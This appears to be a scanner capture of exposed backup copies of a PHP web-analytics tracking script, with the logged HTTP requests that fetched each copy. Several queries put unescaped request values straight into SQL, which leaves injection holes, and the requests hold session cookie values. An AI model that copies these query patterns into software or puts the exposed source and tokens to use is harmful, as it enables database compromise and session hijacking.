Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

import_request_variables('g', 'in_');

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = $domainIdData->ID;
}
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
echo "//$campaign->Title ($campaign->IdentifierType)\n";

if ($campaign->IdentifierType == 'Parameter') {
// Parameter-based campaign
echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($campaign->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$campaign->ParameterToCheck])) {
if ($parameters[$campaign->ParameterToCheck] == $campaign->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
echo "//Matched\n";
$matchedCampaigns[] = $campaign->ID;
}
} else if ($campaign->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($campaign->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($campaign->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheck = $in_referrerNoQuery;
} else {
continue;
}

if ($campaign->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
} else {
if ($urlToCheck == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$safeTitle = $dbConnection->escape_string($in_title);
$safeCurrentUrl = $dbConnection->escape_string($currentUrl);
$safeReferrer = $dbConnection->escape_string($in_referrer);

$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$safeReferrer'), '$safeCurrentUrl', '$safeTitle',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
ConvertDomainNameToDomainId(DomainNameFromURL('$safeCurrentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2008_07_25_r1

/blvdstatus/js/dynamicJS.php_2008_07_25_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_07_25_r1

Request

GET /blvdstatus/js/dynamicJS.php_2008_07_25_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:15 GMT
Server: Apache
Last-Modified: Thu, 24 Jul 2008 19:31:41 GMT
ETag: "2548012-2497-452ca1b41a140"
Accept-Ranges: bytes
Content-Length: 9367
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

import_request_variables('g', 'in_');

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = $domainIdData->ID;
}
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
echo "//$campaign->Title ($campaign->IdentifierType)\n";

if ($campaign->IdentifierType == 'Parameter') {
// Parameter-based campaign
echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($campaign->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$campaign->ParameterToCheck])) {
if ($parameters[$campaign->ParameterToCheck] == $campaign->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
echo "//Matched\n";
$matchedCampaigns[] = $campaign->ID;
}
} else if ($campaign->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($campaign->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($campaign->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheck = $in_referrerNoQuery;
} else {
continue;
}

if ($campaign->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
} else {
if ($urlToCheck == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$in_referrer'), '$currentUrl', '$in_title',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
ConvertDomainNameToDomainId(DomainNameFromURL('$currentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2008_07_24_r1

/blvdstatus/js/dynamicJS.php_2008_07_24_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_07_24_r1

Request

GET /blvdstatus/js/dynamicJS.php_2008_07_24_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:15 GMT
Server: Apache
Last-Modified: Tue, 15 Jul 2008 18:42:01 GMT
ETag: "2548011-2404-452145d101040"
Accept-Ranges: bytes
Content-Length: 9220
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

import_request_variables('g', 'in_');

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = $domainIdData->ID;
}
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoResultCollection = $dbConnection->multi_query("CALL LookupGeoIPData('$ip')");
$geoResults = $dbConnection->store_result();
if ($geoResults != null && gettype($geoResults) == 'object') {
$geoData = $geoResults->fetch_object();
echo "//GDA\n";
} else {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
echo "//GDB\n";
}

// Purge any extraneous result sets
while ($dbConnection->next_result());

echo "//Geo: " . $dbConnection->error . "\n";

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
echo "//$campaign->Title ($campaign->IdentifierType)\n";

if ($campaign->IdentifierType == 'Parameter') {
// Parameter-based campaign
echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($campaign->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$campaign->ParameterToCheck])) {
if ($parameters[$campaign->ParameterToCheck] == $campaign->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
echo "//Matched\n";
$matchedCampaigns[] = $campaign->ID;
}
} else if ($campaign->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($campaign->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($campaign->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheck = $in_referrerNoQuery;
} else {
continue;
}

if ($campaign->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
} else {
if ($urlToCheck == $campaign->URL) {
$matchedCampaigns[] = $campaign->ID;
}
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
echo "//BLVDC: $in_blvdC\n\n";
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$in_referrer'), '$currentUrl', '$in_title',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
ConvertDomainNameToDomainId(DomainNameFromURL('$currentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2008_08_06_r1

/blvdstatus/js/dynamicJS.php_2008_08_06_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_08_06_r1

Request

GET /blvdstatus/js/dynamicJS.php_2008_08_06_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:15 GMT
Server: Apache
Last-Modified: Wed, 30 Jul 2008 18:15:33 GMT
ETag: "2548015-27ca-45341be07bb40"
Accept-Ranges: bytes
Content-Length: 10186
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

import_request_variables('g', 'in_');

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Get a version of the URL with no query string
